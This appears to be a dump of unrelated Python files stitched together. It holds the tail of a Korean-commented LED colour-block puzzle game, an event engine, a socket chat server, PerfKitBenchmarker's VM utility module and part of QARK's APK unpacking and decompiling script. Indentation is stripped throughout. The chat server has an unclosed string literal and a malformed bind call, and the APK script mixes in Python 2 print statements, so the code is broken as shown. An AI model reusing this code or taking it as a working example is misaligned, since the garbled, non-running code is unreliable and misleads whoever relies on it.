AoScreen=Matrix(AiScreen) ## 행렬 형태로 변환하여 저장
currBlk=Matrix(arrayBlk)
tempBlk=AiScreen.clip(top,left,top+currBlk.get_dy(),left+currBlk.get_dx()) ## 사용자가 이동할 공간의 블럭을 잘라내어
tempBlk=tempBlk+currBlk ## tempBlk 생성하여
AoScreen.paste(tempBlk,top,left) ## AoScreen에 paste
draw_matrix(AoScreen); print() ## darw_matrix 호출하여 사용자가 이동한 블럭의 위치를 출력, 위에서 led_init 함수 호출했으므로 이 과정도 led matrix에 출력됨
hint=0 ## 힌트를 한번 이상 사용하지 못하도록 조절하기 위한 변수 설정
while True: ## 사용자가 답변 입력 종료할 때까지 무한 루프
print('Direction : q(quit), a(left), d(right), s(down)')
print('Fix the color block : r(red), y(yellow), g(green), B(blue), P(Pink)')
print('Erase the block : e(erase)')
print('Use a hint : h(hint)')
print('Finish : \' \'')
key=input('Enter a key : ') ## 사용자에게 key 값 입력받아 key 변수에 저장
if key=='q':
Q=1
print('Game terminated')
break ## q 입력 시 Q값을 1로 설정하고 게임 종료 위해 현재 입력문 루프 탈출
elif key=='a':
if left==2:
continue ## 현재 블럭이 이미 가장 왼쪽에 있는 경우 왼쪽으로 이동시키지말고 입력문 루프로 돌아감
left-=4 ## a 입력 시 블럭의 left 값을 4만큼 줄여 사용자 현재 블럭을 왼쪽 칸으로 이동
elif key=='d':
if left==26:
continue
left+=4 ## 동일한 원리, 사용자 현재 블럭을 오른쪽 칸으로 이동
elif key=='s':
if top==10:
continue
top+=4 ## 동일한 원리, 사용자 현재 블럭을 아래 칸으로 이동
elif key=='w':
if top==2:
continue
top-=4 ## 동일한 원리, 사용자 현재 블럭 위 칸으로 이동
elif key=='y':
for a in range(top,top+currBlk.get_dy()):
for b in range(left,left+currBlk.get_dx()):
if (AarrayScreen[a][b]==0)or(AarrayScreen[a][b]==4)or(AarrayScreen[a][b]==7)or(AarrayScreen[a][b]==12)or(AarrayScreen[a][b]==20):
AarrayScreen[a][b]=3
continue ## y 입력 시 해당 칸에 노란 불을 킴
elif AarrayScreen[a][b]==3:
AarrayScreen[a][b]=0
continue ## 이미 노란 불이 켜져있는 경우 불을 끔
elif key=='r':
for a in range(top,top+currBlk.get_dy()):
for b in range(left,left+currBlk.get_dx()):
if (AarrayScreen[a][b]==0)or(AarrayScreen[a][b]==3)or(AarrayScreen[a][b]==7)or(AarrayScreen[a][b]==12)or(AarrayScreen[a][b]==20):
AarrayScreen[a][b]=4
continue ## r 입력 시 해당 칸에 빨간 불을 킴
elif AarrayScreen[a][b]==4:
AarrayScreen[a][b]=0
continue ## 이미 빨간 불이 켜져있는 경우 불을 끔
elif key=='g':
for a in range(top,top+currBlk.get_dy()):
for b in range(left,left+currBlk.get_dx()):
if (AarrayScreen[a][b]==0)or(AarrayScreen[a][b]==4)or(AarrayScreen[a][b]==3)or(AarrayScreen[a][b]==12)or(AarrayScreen[a][b]==20):
AarrayScreen[a][b]=7
continue ## g 입력 시 해당 칸에 초록 불을 킴
elif AarrayScreen[a][b]==7:
AarrayScreen[a][b]=0
continue ## 이미 초록 불이 켜져있는 경우 불을 끔
elif key=='b':
for a in range(top,top+currBlk.get_dy()):
for b in range(left,left+currBlk.get_dx()):
if (AarrayScreen[a][b]==0)or(AarrayScreen[a][b]==3)or(AarrayScreen[a][b]==4)or(AarrayScreen[a][b]==7)or(AarrayScreen[a][b]==20):
AarrayScreen[a][b]=12
continue ## b 입력 시 해당 칸에 파란 불을 킴
elif AarrayScreen[a][b]==12:
AarrayScreen[a][b]=0
continue ## 이미 파란 불이 켜져있는 경우 불을 끔
elif key=='p':
for a in range(top,top+currBlk.get_dy()):
for b in range(left,left+currBlk.get_dx()):
if (AarrayScreen[a][b]==0)or(AarrayScreen[a][b]==4)or(AarrayScreen[a][b]==3)or(AarrayScreen[a][b]==7)or(AarrayScreen[a][b]==12):
AarrayScreen[a][b]=20
continue ## p 입력 시 해당 칸에 분홍 불을 킴
elif AarrayScreen[a][b]==20:
AarrayScreen[a][b]=0
continue ## 이미 분홍 불이 켜져있는 경우 불을 끔
elif key=='e':
for a in range(top,top+currBlk.get_dy()):
for b in range(left,left+currBlk.get_dx()):
AarrayScreen[a][b]=0 ## e 입력 시 해당 칸에 켜져있던 불을 끔
elif key=='h':
if hint==0: ## 하나의 그림 조각마다 힌트는 한번만 사용가능
score=score-1 ## 힌트 사용하면 사용자의 게임 기록 점수 1점 차감
LED_init()
draw_matrix(QoScreen);print()
time.sleep(5) ## h 입력 시 힌트로 문제 화면 5초 동안 출력
hint+=1 ## hint 변수 값 1 증가시켜 힌트 한 번 이상 사용 못하도록 함
elif key==' ':
break ## 스페이스바 입력 시 반복 입력 루프 탈출 및 사용자 입력 종료
else:
print('Wrong key!')
continue
AiScreen=Matrix(AarrayScreen)
tempBlk=AiScreen.clip(top,left,top+currBlk.get_dy(),left+currBlk.get_dx())
tempBlk=tempBlk+currBlk
AoScreen = Matrix(AiScreen)
AoScreen.paste(tempBlk, top, left)
draw_matrix(AoScreen); print()
if Q==1: ## 사용자가 q를 입력하여 입력문 루프 탈출한 경우 i값을 -1로 바꾸고 계속해서 루프 탈출
i=-1
break
draw_matrix(AiScreen); print()
## 입출력 일치 확인
i = 0 ## 한 그림 조각 문제로 게임 할 때마다 i=0 이라고 재설정
for a in range(2,14):
for b in range(2, 30): ##문제Screen과 답변Screen의 모든 칸이 일치하는지 확인
if QarrayScreen[a][b] != AarrayScreen[a][b]:
print("실패하셨습니다.") ##일치하지 않는다면 게임 실패
thehalgguenya = input("게임을 다시 시작하시겠습니까? (Y/N): ") ## 게임을 다시 시작할 것인지 입력받음
if thehalgguenya == "Y":
i = 1
break ## 실패했지만 게임을 다시 시작할 경우 i의 값을 1로 변경한 후 루프 탈출
elif thehalgguenya == "N":
i = 2
break ## 실패했지만 게임을 종료할 경우 i의 값을 2로 변경한 후 루프 탈출
else:
print("잘못된 입력입니다.")
continue
if (i==1)or(i==2):
break ## i의 값이 1 또는 2인 경우 계속해서 루프 탈출
if i == 0: ## 문제Screen과 답변Screen의 모든 칸이 일치한 경우 게임 성공. i의 값은 그대로 0.
score=score+2
print("success")
continue ## 그림 조각 하나 성공 시 점수 2점 획득. for i in picture 루프로 돌아가 다음 그림 출력
if (i==1)or(i==2):
break ## i의 값이 1 또는 2인 경우 계속해서 루프 탈출
if i == 0: ## 그림 하나에 해당하는 모든 조각 문제를 성공한 경우
print("그림하나를 완성하셨습니다.")
if order == 'a' or order == 'b' or order == 'c' or order == 'd':
from watermelon import QarrayScreen ## 수박 그림 조각 문제들을 모두 성공한 경우 watermelon파일에서 수박전체그림이 담긴 QarrayScreen 불러오기
elif order == 'e' or order == 'f' or order == 'g' or order == 'h':
from icecream import QarrayScreen
elif order == 'i' or order == 'j':
from strawberry import QarrayScreen
elif order == 'k' or order == 'l':
from heart import QarrayScreen
elif order == 'm' or order == 'n' or order == 'o' or order == 'p'or order == 'q' or order == 'r':
from dog import QarrayScreen
QiScreen=Matrix(QarrayScreen)
QoScreen=Matrix(QiScreen)
LED_init()
draw_matrix(QoScreen); print()
time.sleep(5) ## 불러온 QarrayScreen을 led matrix에 5초동안 출력
if (i==1)or(i==2):
break ## i의 값이 1 또는 2인 경우 계속해서 루프 탈출
if Q==1:
break ## Q값이 1인 경우 계속해서 루프 탈출
|
event.py
|
# -*- encoding: utf-8 -*-
"""
@File :event.py
@Desc :事件引擎
@Date :2022-03-03 10:48
"""
from collections import defaultdict
from time import sleep
from threading import Thread
from queue import Queue,Empty
from .constant import EVENT_TIMER
class Event:
def __init__(self, etype, data = None):
self.etype = etype
self.data = data
class EventEngine:
"""
Event engine distributes event object based on its type
to those handlers registered.
It also generates timer event by every interval seconds,
which can be used for timing purpose.
"""
def __init__(self, interval = 1):
self._interval = interval
self._queue = Queue()
self._active = False
self._thread = Thread(target=self._run)
self._timer = Thread(target=self._run_timer)
self._handlers = defaultdict(list)
self._general_handlers = []
def _run(self):
while self._active:
try:
event = self._queue.get(block=True, timeout=1)
self._process(event)
except Empty:
pass
def _process(self, event):
if event.etype in self._handlers:
[handler(event) for handler in self._handlers[event.etype]]
if self._general_handlers:
[handler(event) for handler in self._general_handlers]
def _run_timer(self):
while self._active:
sleep(self._interval)
event = Event(EVENT_TIMER)
self.put(event)
def start(self):
self._active = True
self._thread.start()
self._timer.start()
def stop(self):
self._active = False
self._timer.join()
self._thread.join()
def put(self, event):
self._queue.put(event)
def register(self, etype, handler):
handler_list = self._handlers[etype]
if handler not in handler_list:
handler_list.append(handler)
def unregister(self, etype, handler):
handler_list = self._handlers[etype]
if handler in handler_list:
handler_list.remove(handler)
if not handler_list:
self._handlers.pop(etype)
def register_general(self, handler):
if handler not in self._general_handlers:
self._general_handlers.append(handler)
def unregister_general(self, handler):
if handler in self._general_handlers:
self._general_handlers.remove(handler)
|
server.py
|
import socket # simple, but powerfrul socket library
import threading # library to create threads
# defining host and port
host_ip = '127.0.0.1' # local machine ip here, but if you're in a domain or something like that put the ip here
port = 5555 # this is a port that uses tcp and this is why it was chosen, tcp makes possible for users and host to exchange packets of data
# defining the server socket
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # AF_INET means that we're creating a internet socket that is ipv4, SOCK_STREAM means that is a tcp socket
server.bind(host_ip, port) # assigning the ip and the port to the server socket
server.listen()
# defining users and their usernames
users = []
usernames = []
# defining the function that'll enable a user to send a message to all other users
def message_to_all(msg):
for user in users:
user.send(msg)
# defining the function that'll handle the users making possible for them to send messages or get out of the chat room
def handle_users(user):
while True: # endless loop
try:
msg = user.recv(2048) # receiving the data from the socket with buffsize of 2^11 = 2048
message_to_all(msg)
except:
# removing user
user_index = users.index(user)
users.remove(user)
user.close()
username = usernames[user_index]
message_to_all(f'{username} has left the chat'.encode('ascii'))
usernames.remove(username)
break
# defining function that'll receive the new users
def receive():
while True:
user, address = server.accept()
print(f"Connected with {str(address)}") # this part is gonna be seing only by the administrator of the server
user.send('USER_NAME'.encode('ascii))
username = user.recv(2048).decode('ascii') # receiving the username
usernames.append(username) # appending it to the list of usernames
users.append(user) # appending it to the list of users
print(f"Username of the user is {username}") # this part is also gonna be seing only by the administrator
message_to_all(f'{username} has joined the chat, show how awesome this is'.encode('ascii'))
user.send('Connected successfully to the server'.encode('ascii'))
# defining the thread
thread = threading.Thread(target=handle_users, args=(user,)) # putting the target function and it's argument
thread.start()
# calling the receive function
receive()
|
vm_util.py
|
# Copyright 2014 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Set of utility functions for working with virtual machines."""
import contextlib
import logging
import os
import platform
import random
import re
import string
import subprocess
import tempfile
import threading
import time
import jinja2
from perfkitbenchmarker import background_tasks
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
from perfkitbenchmarker import flags
from perfkitbenchmarker import temp_dir
FLAGS = flags.FLAGS
PRIVATE_KEYFILE = 'perfkitbenchmarker_keyfile'
PUBLIC_KEYFILE = 'perfkitbenchmarker_keyfile.pub'
CERT_FILE = 'perfkitbenchmarker.pem'
# The temporary directory on VMs. We cannot reuse GetTempDir()
# because run_uri will not be available at time of module load and we need
# to use this directory as a base for other module level constants.
VM_TMP_DIR = '/tmp/pkb'
# Default timeout for issuing a command.
DEFAULT_TIMEOUT = 300
# Defaults for retrying commands.
POLL_INTERVAL = 30
TIMEOUT = 1200
FUZZ = .5
MAX_RETRIES = -1
WINDOWS = 'nt'
DARWIN = 'Darwin'
PASSWORD_LENGTH = 15
OUTPUT_STDOUT = 0
OUTPUT_STDERR = 1
OUTPUT_EXIT_CODE = 2
_SIMULATE_MAINTENANCE_SEMAPHORE = threading.Semaphore(0)
flags.DEFINE_integer('default_timeout', TIMEOUT, 'The default timeout for '
'retryable commands in seconds.')
flags.DEFINE_integer('burn_cpu_seconds', 0,
'Amount of time in seconds to burn cpu on vm before '
'starting benchmark')
flags.DEFINE_integer('burn_cpu_threads', 1, 'Number of threads to use to '
'burn cpu before starting benchmark.')
flags.DEFINE_integer('background_cpu_threads', None,
'Number of threads of background cpu usage while '
'running a benchmark')
flags.DEFINE_integer('background_network_mbits_per_sec', None,
'Number of megabits per second of background '
'network traffic to generate during the run phase '
'of the benchmark')
flags.DEFINE_boolean('simulate_maintenance', False,
'Whether to simulate VM maintenance during the benchmark. '
'This requires both benchmark and provider support.')
flags.DEFINE_integer('simulate_maintenance_delay', 0,
'The number of seconds to wait to start simulating '
'maintenance.')
class IpAddressSubset(object):
"""Enum of options for --ip_addresses."""
REACHABLE = 'REACHABLE'
BOTH = 'BOTH'
INTERNAL = 'INTERNAL'
EXTERNAL = 'EXTERNAL'
ALL = (REACHABLE, BOTH, INTERNAL, EXTERNAL)
flags.DEFINE_enum('ip_addresses', IpAddressSubset.REACHABLE,
IpAddressSubset.ALL,
'For networking tests: use both internal and external '
'IP addresses (BOTH), external and internal only if '
'the receiving VM is reachable by internal IP (REACHABLE), '
'external IP only (EXTERNAL) or internal IP only (INTERNAL)')
flags.DEFINE_enum('background_network_ip_type', IpAddressSubset.EXTERNAL,
(IpAddressSubset.INTERNAL, IpAddressSubset.EXTERNAL),
'IP address type to use when generating background network '
'traffic')
def GetTempDir():
"""Returns the tmp dir of the current run."""
return temp_dir.GetRunDirPath()
def PrependTempDir(file_name):
"""Returns the file name prepended with the tmp dir of the current run."""
return os.path.join(GetTempDir(), file_name)
def GenTempDir():
"""Creates the tmp dir for the current run if it does not already exist."""
temp_dir.CreateTemporaryDirectories()
def SSHKeyGen():
"""Create PerfKitBenchmarker SSH keys in the tmp dir of the current run."""
if not os.path.isdir(GetTempDir()):
GenTempDir()
if not os.path.isfile(GetPrivateKeyPath()):
create_cmd = ['ssh-keygen',
'-t',
'rsa',
'-N',
'',
'-q',
'-f',
PrependTempDir(PRIVATE_KEYFILE)]
shell_value = RunningOnWindows()
create_process = subprocess.Popen(create_cmd,
shell=shell_value,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
create_process.communicate()
if not os.path.isfile(GetCertPath()):
create_cmd = ['openssl',
'req',
'-x509',
'-new',
'-out',
PrependTempDir(CERT_FILE),
'-key',
PrependTempDir(PRIVATE_KEYFILE)]
shell_value = RunningOnWindows()
create_process = subprocess.Popen(create_cmd,
shell=shell_value,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
create_process.communicate(input='\n' * 7)
def GetPrivateKeyPath():
return PrependTempDir(PRIVATE_KEYFILE)
def GetPublicKeyPath():
return PrependTempDir(PUBLIC_KEYFILE)
def GetCertPath():
return PrependTempDir(CERT_FILE)
def GetSshOptions(ssh_key_filename, connect_timeout=5):
"""Return common set of SSH and SCP options."""
options = [
'-2',
'-o', 'UserKnownHostsFile=/dev/null',
'-o', 'StrictHostKeyChecking=no',
'-o', 'IdentitiesOnly=yes',
'-o', 'PreferredAuthentications=publickey',
'-o', 'PasswordAuthentication=no',
'-o', 'ConnectTimeout=%d' % connect_timeout,
'-o', 'GSSAPIAuthentication=no',
'-o', 'ServerAliveInterval=30',
'-o', 'ServerAliveCountMax=10',
'-i', ssh_key_filename
]
options.extend(FLAGS.ssh_options)
return options
# TODO(skschneider): Remove at least RunParallelProcesses and RunParallelThreads
# from this file (update references to call directly into background_tasks).
RunParallelProcesses = background_tasks.RunParallelProcesses
RunParallelThreads = background_tasks.RunParallelThreads
RunThreaded = background_tasks.RunThreaded
def Retry(poll_interval=POLL_INTERVAL, max_retries=MAX_RETRIES,
timeout=None, fuzz=FUZZ, log_errors=True,
retryable_exceptions=None):
"""A function decorator that will retry when exceptions are thrown.
Args:
poll_interval: The time between tries in seconds. This is the maximum poll
interval when fuzz is specified.
max_retries: The maximum number of retries before giving up. If -1, this
means continue until the timeout is reached. The function will stop
retrying when either max_retries is met or timeout is reached.
timeout: The timeout for all tries in seconds. If -1, this means continue
until max_retries is met. The function will stop retrying when either
max_retries is met or timeout is reached.
fuzz: The amount of randomness in the sleep time. This is used to
keep threads from all retrying at the same time. At 0, this
means sleep exactly poll_interval seconds. At 1, this means
sleep anywhere from 0 to poll_interval seconds.
log_errors: A boolean describing whether errors should be logged.
retryable_exceptions: A tuple of exceptions that should be retried. By
default, this is None, which indicates that all exceptions should
be retried.
Returns:
A function that wraps functions in retry logic. It can be
used as a decorator.
"""
if retryable_exceptions is None:
retryable_exceptions = Exception
def Wrap(f):
"""Wraps the supplied function with retry logic."""
def WrappedFunction(*args, **kwargs):
"""Holds the retry logic."""
local_timeout = FLAGS.default_timeout if timeout is None else timeout
if local_timeout >= 0:
deadline = time.time() + local_timeout
else:
deadline = float('inf')
tries = 0
while True:
try:
tries += 1
return f(*args, **kwargs)
except retryable_exceptions as e:
fuzz_multiplier = 1 - fuzz + random.random() * fuzz
sleep_time = poll_interval * fuzz_multiplier
if ((time.time() + sleep_time) >= deadline or
(max_retries >= 0 and tries > max_retries)):
raise
else:
if log_errors:
logging.info('Retrying exception running %s: %s', f.__name__, e)
time.sleep(sleep_time)
return WrappedFunction
return Wrap
def IssueCommand(cmd, force_info_log=False, suppress_warning=False,
env=None, timeout=DEFAULT_TIMEOUT, cwd=None):
"""Tries running the provided command once.
Args:
cmd: A list of strings such as is given to the subprocess.Popen()
constructor.
force_info_log: A boolean indicating whether the command result should
always be logged at the info level. Command results will always be
logged at the debug level if they aren't logged at another level.
suppress_warning: A boolean indicating whether the results should
not be logged at the info level in the event of a non-zero
return code. When force_info_log is True, the output is logged
regardless of suppress_warning's value.
env: A dict of key/value strings, such as is given to the subprocess.Popen()
constructor, that contains environment variables to be injected.
timeout: Timeout for the command in seconds. If the command has not finished
before the timeout is reached, it will be killed. Set timeout to None to
let the command run indefinitely. If the subprocess is killed, the
return code will indicate an error, and stdout and stderr will
contain what had already been written to them before the process was
killed.
cwd: Directory in which to execute the command.
Returns:
A tuple of stdout, stderr, and retcode from running the provided command.
"""
if env:
logging.debug('Environment variables: %s' % env)
full_cmd = ' '.join(cmd)
logging.info('Running: %s', full_cmd)
time_file_path = '/usr/bin/time'
runningOnWindows = RunningOnWindows()
runningOnDarwin = RunningOnDarwin()
should_time = (not (runningOnWindows or runningOnDarwin) and
os.path.isfile(time_file_path) and FLAGS.time_commands)
shell_value = runningOnWindows
with tempfile.TemporaryFile() as tf_out, \
tempfile.TemporaryFile() as tf_err, \
tempfile.NamedTemporaryFile(mode='r') as tf_timing:
cmd_to_use = cmd
if should_time:
cmd_to_use = [time_file_path,
'-o', tf_timing.name,
'--quiet',
'-f', ', WallTime:%Es, CPU:%Us, MaxMemory:%Mkb '] + cmd
process = subprocess.Popen(cmd_to_use, env=env, shell=shell_value,
stdin=subprocess.PIPE, stdout=tf_out,
stderr=tf_err, cwd=cwd)
def _KillProcess():
logging.error('IssueCommand timed out after %d seconds. '
'Killing command "%s".', timeout, full_cmd)
process.kill()
timer = threading.Timer(timeout, _KillProcess)
timer.start()
try:
process.wait()
finally:
timer.cancel()
tf_out.seek(0)
stdout = tf_out.read().decode('ascii', 'ignore')
tf_err.seek(0)
stderr = tf_err.read().decode('ascii', 'ignore')
timing_output = ''
if should_time:
timing_output = tf_timing.read().rstrip('\n')
debug_text = ('Ran: {%s} ReturnCode:%s%s\nSTDOUT: %s\nSTDERR: %s' %
(full_cmd, process.returncode, timing_output, stdout, stderr))
if force_info_log or (process.returncode and not suppress_warning):
logging.info(debug_text)
else:
logging.debug(debug_text)
return stdout, stderr, process.returncode
def IssueBackgroundCommand(cmd, stdout_path, stderr_path, env=None):
"""Run the provided command once in the background.
Args:
cmd: Command to be run, as expected by subprocess.Popen.
stdout_path: Redirect stdout here. Overwritten.
stderr_path: Redirect stderr here. Overwritten.
env: A dict of key/value strings, such as is given to the subprocess.Popen()
constructor, that contains environment variables to be injected.
"""
logging.debug('Environment variables: %s' % env)
full_cmd = ' '.join(cmd)
logging.info('Spawning: %s', full_cmd)
outfile = open(stdout_path, 'w')
errfile = open(stderr_path, 'w')
shell_value = RunningOnWindows()
subprocess.Popen(cmd, env=env, shell=shell_value,
stdout=outfile, stderr=errfile, close_fds=True)
@Retry()
def IssueRetryableCommand(cmd, env=None):
"""Tries running the provided command until it succeeds or times out.
Args:
cmd: A list of strings such as is given to the subprocess.Popen()
constructor.
env: An alternate environment to pass to the Popen command.
Returns:
A tuple of stdout and stderr from running the provided command.
"""
stdout, stderr, retcode = IssueCommand(cmd, env=env)
if retcode:
raise errors.VmUtil.CalledProcessException(
'Command returned a non-zero exit code.\n')
return stdout, stderr
def ParseTimeCommandResult(command_result):
"""Parse command result and get time elapsed.
Note this parses the output of bash's time builtin, not /usr/bin/time or other
implementations. You may need to run something like bash -c "time ./command"
to produce parseable output.
Args:
command_result: The result after executing a remote time command.
Returns:
Time taken for the command.
"""
time_data = re.findall(r'real\s+(\d+)m(\d+.\d+)', command_result)
time_in_seconds = 60 * float(time_data[0][0]) + float(time_data[0][1])
return time_in_seconds
def ShouldRunOnExternalIpAddress():
"""Returns whether a test should be run on an instance's external IP."""
return FLAGS.ip_addresses in (IpAddressSubset.EXTERNAL,
IpAddressSubset.BOTH,
IpAddressSubset.REACHABLE)
def ShouldRunOnInternalIpAddress(sending_vm, receiving_vm):
"""Returns whether a test should be run on an instance's internal IP.
Based on the command line flag --ip_addresses. Internal IP addresses are used
when:
* --ip_addresses=BOTH or --ip-addresses=INTERNAL
* --ip_addresses=REACHABLE and 'sending_vm' can ping 'receiving_vm' on its
internal IP.
Args:
sending_vm: VirtualMachine. The client.
receiving_vm: VirtualMachine. The server.
Returns:
Whether a test should be run on an instance's internal IP.
"""
return (FLAGS.ip_addresses in (IpAddressSubset.BOTH,
IpAddressSubset.INTERNAL) or
(FLAGS.ip_addresses == IpAddressSubset.REACHABLE and
sending_vm.IsReachable(receiving_vm)))
def GetLastRunUri():
"""Returns the last run_uri used (or None if it can't be determined)."""
runs_dir_path = temp_dir.GetAllRunsDirPath()
try:
dir_names = next(os.walk(runs_dir_path))[1]
except StopIteration:
# The runs directory was not found.
return None
if not dir_names:
# No run subdirectories were found in the runs directory.
return None
# Return the subdirectory with the most recent modification time.
return max(dir_names,
key=lambda d: os.path.getmtime(os.path.join(runs_dir_path, d)))
@contextlib.contextmanager
def NamedTemporaryFile(prefix='tmp', suffix='', dir=None, delete=True):
"""Behaves like tempfile.NamedTemporaryFile.
The existing tempfile.NamedTemporaryFile has the annoying property on
Windows that it cannot be opened a second time while it is already open.
This makes it impossible to use it with a "with" statement in a cross platform
compatible way. This serves a similar role, but allows the file to be closed
within a "with" statement without causing the file to be unlinked until the
context exits.
"""
f = tempfile.NamedTemporaryFile(prefix=prefix, suffix=suffix,
dir=dir, delete=False)
try:
yield f
finally:
if not f.closed:
f.close()
if delete:
os.unlink(f.name)
def GenerateSSHConfig(vms, vm_groups):
"""Generates an SSH config file to simplify connecting to the specified VMs.
Writes a file to GetTempDir()/ssh_config with an SSH configuration for each VM
provided in the arguments. Users can then SSH with any of the following:
ssh -F <ssh_config_path> <vm_name>
ssh -F <ssh_config_path> vm<vm_index>
ssh -F <ssh_config_path> <group_name>-<index>
Args:
vms: list of BaseVirtualMachines.
vm_groups: dict mapping VM group name string to list of BaseVirtualMachines.
"""
target_file = os.path.join(GetTempDir(), 'ssh_config')
template_path = data.ResourcePath('ssh_config.j2')
environment = jinja2.Environment(undefined=jinja2.StrictUndefined)
with open(template_path) as fp:
template = environment.from_string(fp.read())
with open(target_file, 'w') as ofp:
ofp.write(template.render({'vms': vms, 'vm_groups': vm_groups}))
ssh_options = [' ssh -F {0} {1}'.format(target_file, pattern)
for pattern in ('<vm_name>', 'vm<index>',
'<group_name>-<index>')]
logging.info('ssh to VMs in this benchmark by name with:\n%s',
'\n'.join(ssh_options))
def RunningOnWindows():
"""Returns True if PKB is running on Windows."""
return os.name == WINDOWS
def RunningOnDarwin():
"""Returns True if PKB is running on a Darwin OS machine."""
return os.name != WINDOWS and platform.system() == DARWIN
def ExecutableOnPath(executable_name):
"""Return True if the given executable can be found on the path."""
cmd = ['where'] if RunningOnWindows() else ['which']
cmd.append(executable_name)
shell_value = RunningOnWindows()
process = subprocess.Popen(cmd,
shell=shell_value,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
process.communicate()
if process.returncode:
return False
return True
def GenerateRandomWindowsPassword(password_length=PASSWORD_LENGTH):
"""Generates a password that meets Windows complexity requirements."""
# The special characters have to be recognized by the Azure CLI as
# special characters. This greatly limits the set of characters
# that we can safely use. See
# https://github.com/Azure/azure-xplat-cli/blob/master/lib/commands/arm/vm/vmOsProfile._js#L145
special_chars = '*!@#$%+='
password = [
random.choice(string.ascii_letters + string.digits + special_chars)
for _ in range(password_length - 4)]
# Ensure that the password contains at least one of each 4 required
# character types.
password.append(random.choice(string.ascii_lowercase))
password.append(random.choice(string.ascii_uppercase))
password.append(random.choice(string.digits))
password.append(random.choice(special_chars))
return ''.join(password)
def StartSimulatedMaintenance():
"""Initiates the simulated maintenance event."""
if FLAGS.simulate_maintenance:
_SIMULATE_MAINTENANCE_SEMAPHORE.release()
def SetupSimulatedMaintenance(vm):
"""Called ready VM for simulated maintenance."""
if FLAGS.simulate_maintenance:
def _SimulateMaintenance():
_SIMULATE_MAINTENANCE_SEMAPHORE.acquire()
time.sleep(FLAGS.simulate_maintenance_delay)
vm.SimulateMaintenanceEvent()
t = threading.Thread(target=_SimulateMaintenance)
t.daemon = True
t.start()
|
unpackAPK.py
|
from __future__ import absolute_import
'''Copyright 2015 LinkedIn Corp. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.'''
import zipfile
import os
from genericpath import isdir
import subprocess
import logging
import shlex
import threading
import re
import shutil
import time
from subprocess import Popen, PIPE, STDOUT
from collections import defaultdict
from multiprocessing import Process
from threading import Thread, Lock
from lib.progressbar import *
from lib import blessings
from modules.common import logger
from modules import report
from modules import common
from lib.pubsub import pub
lock = Lock()
progresswriter1 = common.Writer((0, common.term.height - 10))
progressbar1 = ProgressBar(widgets=['JD CORE ', Percentage(), Bar()], maxval=100, fd=progresswriter1)
progresswriter2 = common.Writer((0, common.term.height - 8))
progressbar2 = ProgressBar(widgets=['Procyon ', Percentage(), Bar()], maxval=100, fd=progresswriter2)
progresswriter3 = common.Writer((0, common.term.height - 6))
progressbar3 = ProgressBar(widgets=['CFR ', Percentage(), Bar()], maxval=100, fd=progresswriter3)
def unpack():
"""
APK to DEX
"""
logger.info('Unpacking %s', common.apkPath)
# Get the directory to unpack to
try:
dirname, extension = common.apkPath.rsplit(".", 1)
# workaround for cases where path may include whitespace
file_temp = open(common.apkPath, 'r')
zf = zipfile.ZipFile(file_temp)
logger.info('Zipfile: %s', zf)
for filename in [zf.namelist()]:
if not os.path.exists(dirname + "/"):
os.makedirs(dirname + "/")
zf.extractall(dirname + "/", zf.namelist(), )
logger.info('Extracted APK to %s', dirname + '/')
common.pathToDEX = dirname + "/classes.dex"
if not os.path.exists(common.pathToDEX): # Some default/system APKs from Google don't have this file
logger.error("The classes.dex file was not found for this APK! Please select a different APK.")
raise Exception
common.pathToUnpackedAPK = dirname + '/'
return True
except Exception as e:
if not common.interactive_mode:
logger.error(common.args.apkpath + common.config.get('qarkhelper', 'NOT_A_VALID_APK'))
exit()
logger.error(common.config.get('qarkhelper', 'NOT_A_VALID_APK_INTERACTIVE'))
raise
def get_apk_info(pathToAPK):
package = defaultdict(list)
print "starting"
aapt = Popen(['aapt', 'dump', 'badging', pathToAPK], stdout=PIPE, stdin=PIPE, stderr=STDOUT, bufsize=1)
for line in aapt.stdout:
print line,
if line.startswith("package"):
package['application-name'] = line.split(" ")[1].split("'")[1]
package['application-version'] = line.split(" ")[3].split("'")[1]
if line.startswith("sdkVersion"):
package['application-sdkversion'] = line.split("'")[1]
if line.startswith("targetSdkVersion"):
package['application-targetSdkVersion'] = line.split("'")[1]
if line.startswith("application-label"):
package['application-label'] = line.split("'")[1]
if "application-debuggable" in line:
package['application-debuggable'] = True
if line.startswith("uses-permission"):
package['application-permissions'].append(line.split("'")[1])
return package
def find_manifest_in_unpacked_apk(path, name):
"""
Finds manifest.xml from the unpacked APK
"""
pathFromAPK = path.rsplit(".", 1)[0]
common.sourceDirectory = pathFromAPK
logger.info('Finding %s in %s', name, pathFromAPK)
common.logger.debug(pathFromAPK, name)
for root, dirs, files in os.walk(pathFromAPK):
for file in files:
if name in file:
logger.info('%s found', name)
return os.path.join(root, name)
def grep_1(path, regex):
"""
wrapper around grep functionality
"""
regObj = re.compile(regex)
res = []
for root, dirs, fnames in os.walk(path):
for fname in fnames:
if not fname.startswith("."):
with open(root + "/" + fname, "r") as f:
data = f.read()
if re.search(regObj, data, ):
res.append(os.path.join(root, fname))
f.close()
return res
def decompile(path):
"""
Converts DEX to JAR(containing class files) and then class files to near original java code using 3 different decompilers and selecting the best available decompiled code
"""
common.pathToDEX = path
pathToDex2jar = common.rootDir + "/lib/dex2jar/dex2jar.sh"
sp = subprocess.Popen([pathToDex2jar, common.pathToDEX], shell=False, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
output, error = sp.communicate()
common.pathToJar = common.pathToDEX.rsplit(".", 1)[0] + "_dex2jar.jar"
dirname, extension = common.pathToJar.rsplit(".", 1)
